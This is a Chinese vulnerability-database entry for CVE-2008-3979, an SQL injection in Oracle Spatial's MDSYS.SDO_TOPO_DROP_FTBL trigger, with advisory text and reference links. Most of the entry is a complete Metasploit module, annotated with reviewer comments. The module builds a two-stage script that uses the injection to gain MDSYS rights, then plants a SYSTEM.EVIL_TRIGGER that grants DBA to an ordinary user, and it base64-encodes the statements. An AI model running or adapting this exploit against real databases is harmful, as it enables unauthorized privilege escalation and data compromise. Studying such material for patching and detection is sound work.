Oracle Database 组件Oracle Spatial 未明访问控制安全漏洞

漏洞ID 1117410 漏洞类型
发布时间 2009-02-18 更新时间 2009-03-06
CVE编号 CVE-2008-3979 CNNVD-ID CNNVD-200901-133
漏洞平台 Multiple CVSS评分 5.5
|漏洞来源
https://www.exploit-db.com/exploits/8074
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-133
|漏洞详情
Oracle Database 是一款商业性质的大型数据库系统。Oracle Database(10.1.0.5、10.2.0.2)的 Oracle Spatial 组件存在未明访问控制安全漏洞。远程认证用户可以通过未明向量影响系统的机密性、完整性和可用性。注意:Oracle 声明在执行 MDSYS.SDO_TOPO_DROP_FTBL 触发器时没有正确地过滤某些输入,远程认证用户可以执行 SQL 注入攻击。成功攻击要求拥有 CREATE SESSION 权限。修复信息见参考资料中的 Oracle 2009 年 1 月关键补丁更新(CPU)。
|漏洞EXP
##
# $Id: droptable_trigger.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'


# Auxiliary module for CVE-2008-3979 (SQL injection in the
# MDSYS.SDO_TOPO_DROP_FTBL trigger). It only assembles a SQL script as text and
# hands it to file_create; nothing in this class opens a database connection.
#
# Reviewer notes for defenders, all taken from the statements built in #run:
# * the script creates a trigger with the fixed name SYSTEM.EVIL_TRIGGER on
#   SYSTEM.DEF$_TEMP$LOB and never drops it;
# * it grants EXECUTE to PUBLIC on two randomly named objects in the USER schema;
# * it creates and drops a table whose quoted name starts with O' and 1=
# * the statement text is base64-encoded inside the script, so reviewing a
#   captured script means decoding the utl_encode.base64_decode arguments.
# The page's references point to Oracle's January 2009 Critical Patch Update.
class Metasploit3 < Msf::Auxiliary

	# Provides file_create, which #run uses to write the generated script.
	include Msf::Exploit::FILEFORMAT

	# Registers the module metadata (name, description, references, disclosure
	# date) and the four datastore options read by #run.
	#
	# @param info [Hash] metadata merged into the defaults through update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SQL Injection in  MDSYS.SDO_TOPO_DROP_FTBL Trigger.',
			'Description'    => %q{
					This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in
					the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege
					given to MDSYS user by creating evil trigger in system scheme (2-stage attack).
			},
			'Author'         => [ 'Sh2kerr <research[ad]dsec.ru>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:$',
			'References'     =>
				[
					[ 'CVE', '2008-3979' ],
					[ 'URL', 'http://www.securityfocus.com/archive/1/500061' ],
					[ 'URL', 'http://www.ngssoftware.com/' ],
				],
			'DisclosureDate' => 'Jan 13 2009'))

			# All four options are optional and carry defaults. SQL and USER are
			# interpolated verbatim into the generated statements in #run.
			# FILENAME and OUTPUTPATH are presumably consumed by file_create
			# (defined in the FILEFORMAT mixin, not shown here).
			register_options( 
				[
					OptString.new('SQL',      [ false, 'The SQL to execute.',  'GRANT DBA TO SCOTT']),
					OptString.new('USER',      [ false, 'The current user. ',  'SCOTT']),
					OptString.new('FILENAME', [ false, 'The file name.',  'msf.sql']),
					OptString.new('OUTPUTPATH', [ false, 'The location of the file.',  './data/exploits/']),
				
				], self.class)
	end

	# Builds the two-stage SQL script described in the module description and
	# writes it out with file_create. Performs no database I/O itself.
	def run
		# Random identifiers: name1/name2 name the helper procedure and function,
		# rand1..rand5 name the PL/SQL variables in the wrapper block. Lengths are
		# 1..10 (rand(10) + 1); uppercase letters, going by the helper's name.
		name1  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand4 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		rand5 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

		# Invoker-rights (AUTHID CURRENT_USER) procedure that runs the SQL option
		# through EXECUTE IMMEDIATE in an autonomous transaction.
		function1 = %Q|
			CREATE OR REPLACE PROCEDURE #{name1}
			AUTHID CURRENT_USER AS
			PRAGMA AUTONOMOUS_TRANSACTION; 
			BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; 
			END;
			|


		# Invoker-rights function that creates system.evil_trigger (BEFORE INSERT
		# on system.DEF$_TEMP$LOB); the trigger body calls USER.name1. The trigger
		# name is a fixed string, which makes it a stable indicator to search for.
		function2 = %Q|
			CREATE OR REPLACE FUNCTION #{name2} RETURN number AUTHID CURRENT_USER is
			PRAGMA AUTONOMOUS_TRANSACTION;
			STMT VARCHAR2(400):= 'create or replace trigger system.evil_trigger before insert on system.DEF$_TEMP$LOB DECLARE msg VARCHAR2(10);
			BEGIN #{datastore['USER']}.#{name1};
			end evil_trigger;';
			BEGIN
			EXECUTE IMMEDIATE STMT;
			COMMIT;
			RETURN 1;
			END;
			|

		# Table whose quoted identifier embeds a single quote and a call to
		# USER.name2. Per the module description, the injection happens in the
		# MDSYS.SDO_TOPO_DROP_FTBL trigger, so it is the later DROP TABLE that
		# causes name2 to be evaluated.
		prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"
		
		# First stage: drop the specially named table.
		exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
		
		# Second stage: an insert into the table that system.evil_trigger is
		# defined on, which fires that trigger.
		exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"
		
		# Each statement is base64-encoded here and decoded in PL/SQL below;
		# presumably this avoids quoting problems when the text is placed inside
		# single-quoted literals. It also means the statements do not appear in
		# clear text in the generated file.
		fun1  = Rex::Text.encode_base64(function1)
		fun2 = Rex::Text.encode_base64(function2)
		prp  = Rex::Text.encode_base64(prepare)
		exp1 = Rex::Text.encode_base64(exploiting1)
		exp2 = Rex::Text.encode_base64(exploiting2)
		

		# Anonymous PL/SQL block: decode and run each statement in order, granting
		# EXECUTE on both helper objects to PUBLIC along the way, then two
		# trailing DROP statements.
		# NOTE(review): name1 is created as a PROCEDURE above but is dropped here
		# with DROP FUNCTION; presumably that statement fails and the procedure
		# stays in the USER schema. Nothing in the script drops
		# system.evil_trigger or the PUBLIC grants, so those remain as artifacts.
		sql = %Q|
			DECLARE
			#{rand1} VARCHAR2(32767);
			#{rand2} VARCHAR2(32767);
			#{rand3} VARCHAR2(32767);
			#{rand4} VARCHAR2(32767);
			#{rand5} VARCHAR2(32767);
			BEGIN
			#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun1}')));
			EXECUTE IMMEDIATE #{rand1};
			EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name1} TO PUBLIC';
			#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun2}')));
			EXECUTE IMMEDIATE #{rand2};
			EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name2} TO PUBLIC';
			#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
			EXECUTE IMMEDIATE #{rand3};
			#{rand4} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
			EXECUTE IMMEDIATE #{rand4};
			#{rand5} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp2}')));
			EXECUTE IMMEDIATE #{rand5};
			END;
			/
			DROP FUNCTION #{name1};
			DROP FUNCTION #{name2};
			|


		# Report the target file name, then write the script through the
		# FILEFORMAT mixin.
		print_status("Creating '#{datastore['FILENAME']}' file ...")		
		file_create(sql)


	end

end 

# milw0rm.com [2009-02-18]
|参考资料

来源:www.oracle.com
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
来源:SECTRACK
名称:1021561
链接:http://www.securitytracker.com/id?1021561
来源:BID
名称:33177
链接:http://www.securityfocus.com/bid/33177
来源:BUGTRAQ
名称:20090113 Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
链接:http://www.securityfocus.com/archive/1/archive/1/500061/100/0/threaded
来源:MILW0RM
名称:8074
链接:http://www.milw0rm.com/exploits/8074
来源:VUPEN
名称:ADV-2009-0115
链接:http://www.frsirt.com/english/advisories/2009/0115
来源:SECUNIA
名称:33525
链接:http://secunia.com/advisories/33525
来源:OSVDB
名称:51354
链接:http://osvdb.org/51354